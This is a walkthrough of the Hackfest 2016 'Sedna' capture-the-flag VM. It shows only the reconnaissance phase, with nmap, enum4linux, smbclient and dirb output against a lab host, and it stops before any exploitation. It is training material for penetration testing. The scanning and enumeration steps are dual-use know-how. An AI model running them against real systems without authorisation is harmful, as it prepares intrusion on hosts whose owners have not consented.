hackfest2016: Sedna Walkthrough

Sedna is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
Welcome to Sedna
This is a vulnerable machine I created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Medium
Tips:
There are multiple ways to root this box. If it should work but doesn't, try to gather more info about why it's not working.
Goals: This machine is intended to be doable by someone who has some experience doing machines on Vulnhub
There are 4 flags on this machine 
One for a shell 
One for root access 
Two for doing post exploitation on Sedna
Feedback: This is my second vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com
Special Thanks to madmantm for testing this virtual machine
SHA-256 : 178306779A86965E0361AA20BA458C71F2C7AEB490F5FD8FAAFAEDAE18E0B0BA

Identify the IP address of the Sedna machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 15:27 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 7.45% done; ETC: 15:27 (0:00:00 remaining)
Nmap scan report for 192.168.1.1
Host is up (0.0016s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.091s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.4
Host is up (0.060s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.062s latency).
MAC Address: 08:6D:41:BA:BD:EC (Unknown)
Nmap scan report for 192.168.1.8
Host is up (0.093s latency).
MAC Address: 68:07:15:7A:EC:52 (Unknown)
Nmap scan report for 192.168.1.9
Host is up (0.093s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.10
Host is up (0.074s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00040s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.085s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.28
Host is up (0.00055s latency).
MAC Address: 08:00:27:CD:8F:83 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 6.86 seconds
root@kali:~#

Identify services running on Sedna

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.28
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 15:28 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating ARP Ping Scan at 15:28
Scanning 192.168.1.28 [1 port]
Completed ARP Ping Scan at 15:28, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.01s elapsed
Initiating Connect Scan at 15:28
Scanning 192.168.1.28 [65535 ports]
Discovered open port 53/tcp on 192.168.1.28
Discovered open port 993/tcp on 192.168.1.28
Discovered open port 110/tcp on 192.168.1.28
Discovered open port 139/tcp on 192.168.1.28
Discovered open port 80/tcp on 192.168.1.28
Discovered open port 143/tcp on 192.168.1.28
Discovered open port 8080/tcp on 192.168.1.28
Discovered open port 111/tcp on 192.168.1.28
Discovered open port 445/tcp on 192.168.1.28
Discovered open port 22/tcp on 192.168.1.28
Discovered open port 995/tcp on 192.168.1.28
Discovered open port 50177/tcp on 192.168.1.28
Completed Connect Scan at 15:28, 2.78s elapsed (65535 total ports)
Initiating Service scan at 15:28
Scanning 12 services on 192.168.1.28
Completed Service scan at 15:28, 12.10s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.28
NSE: Script scanning 192.168.1.28.
Initiating NSE at 15:28
Completed NSE at 15:28, 8.22s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.01s elapsed
Nmap scan report for 192.168.1.28
Host is up (0.00043s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS UIDL CAPA AUTH-RESP-CODE RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 46452/udp status
|_ 100024 1 50177/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more listed IDLE capabilities have LOGINDISABLEDA0001 Pre-login LITERAL+ IMAP4rev1 OK STARTTLS ENABLE ID LOGIN-REFERRALS post-login SASL-IR
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more listed IDLE capabilities have SASL-IR LITERAL+ IMAP4rev1 Pre-login OK ENABLE ID LOGIN-REFERRALS post-login AUTH=PLAINA0001
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER UIDL CAPA AUTH-RESP-CODE RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
50177/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:CD:8F:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 198.840 days (since Sun Oct 30 19:19:22 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
| nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SEDNA<00> Flags: <unique><active>
| SEDNA<03> Flags: <unique><active>
| SEDNA<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: sedna
| NetBIOS computer name: SEDNA
| Domain name:
| FQDN: sedna
|_ System time: 2017-05-17T15:28:35-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.1.28
NSE: Script Post-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 4s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.55 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 6.6.1p1

No suitable exploits were found, hence moving on.

Port 139,445 — Inspecting SMB — netbios-ssn Samba smbd

Let's run enum4linux

root@kali:~# enum4linux 192.168.1.28
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 17 15:30:03 2017
==========================
| Target Information |
==========================
Target ........... 192.168.1.28
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.28 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.28 |
============================================
Looking up status of 192.168.1.28
SEDNA <00> - B <ACTIVE> Workstation Service
SEDNA <03> - B <ACTIVE> Messenger Service
SEDNA <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.28 |
=====================================
[+] Server 192.168.1.28 allows sessions using username '', password ''
===========================================
| Getting domain SID for 192.168.1.28 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.28 |
======================================
[+] Got OS info for 192.168.1.28 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
[+] Got OS info for 192.168.1.28 from srvinfo:
SEDNA Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
=============================
| Users on 192.168.1.28 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]
=========================================
| Share Enumeration on 192.168.1.28 |
=========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (Sedna server (Samba, Ubuntu))
print$          Disk      Printer Drivers
Server               Comment
---------            -------
SEDNA                Sedna server (Samba, Ubuntu)
Workgroup            Master
---------            -------
WORKGROUP            SEDNA
[+] Attempting to map shares on 192.168.1.28
//192.168.1.28/IPC$ Mapping: OK Listing: DENIED
//192.168.1.28/print$ Mapping: DENIED, Listing: N/A
====================================================
| Password Policy Information for 192.168.1.28 |
====================================================
[+] Attaching to 192.168.1.28 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] SEDNA
[+] Builtin
[+] Password Info for Domain: SEDNA
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.28 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.28 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-5-21-2217169221-2747901371-1699642345
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2217169221-2747901371-1699642345 and logon username '', password ''
S-1-5-21-2217169221-2747901371-1699642345-500 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-501 SEDNA\nobody (Local User)
S-1-5-21-2217169221-2747901371-1699642345-502 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-503 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-504 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-505 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-506 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-507 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-508 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-509 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-510 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-511 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-512 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-513 SEDNA\None (Domain Group)
S-1-5-21-2217169221-2747901371-1699642345-514 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-515 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-516 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-517 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-518 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-519 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-520 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-521 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-522 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-523 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-524 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-525 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-526 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-527 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-528 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-529 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-530 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-531 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-532 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-533 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-534 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-535 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-536 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-537 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-538 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-539 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-540 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-541 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-542 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-543 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-544 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-545 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-546 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-547 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-548 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-549 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-550 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1000 SEDNA\viper (Local User)
S-1-5-21-2217169221-2747901371-1699642345-1001 SEDNA\root (Local User)
S-1-5-21-2217169221-2747901371-1699642345-1002 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1003 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1004 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1005 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1006 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1007 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1008 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1009 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1010 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1011 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1012 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1013 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1014 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1015 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1016 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1017 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1018 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1019 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1020 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1021 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1022 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1023 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1024 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1025 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1026 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1027 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1028 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1029 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1030 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1031 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1032 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1033 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1034 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1035 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1036 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1037 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1038 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1039 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1040 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1041 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1042 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1043 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1044 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1045 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1046 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1047 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1048 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1049 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\crackmeforpoints (Local User)
=============================================
| Getting printer info for 192.168.1.28 |
=============================================
No printers returned.
enum4linux complete on Wed May 17 15:30:24 2017
root@kali:~#

From this we figure out the following:

  1. Samba version: Samba 4.1.6-Ubuntu
  2. Null sessions are enabled
  3. Local user: crackmeforpoints

root@kali:~# smbclient --list=192.168.1.28
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       IPC Service (Sedna server (Samba, Ubuntu))
print$          Disk      Printer Drivers
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Server               Comment
---------            -------
SEDNA                Sedna server (Samba, Ubuntu)
Workgroup            Master
---------            -------
WORKGROUP            SEDNA
root@kali:~#

Port 80 — Inspecting HTTP — Apache httpd 2.4.7 ((Ubuntu))

root@kali:~# dirb http://192.168.1.28
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 17 15:34:42 2017
URL_BASE: http://192.168.1.28/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.28/ ----
==> DIRECTORY: http://192.168.1.28/blocks/
==> DIRECTORY: http://192.168.1.28/files/
+ http://192.168.1.28/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://192.168.1.28/modules/
+ http://192.168.1.28/robots.txt (CODE:200|SIZE:36)
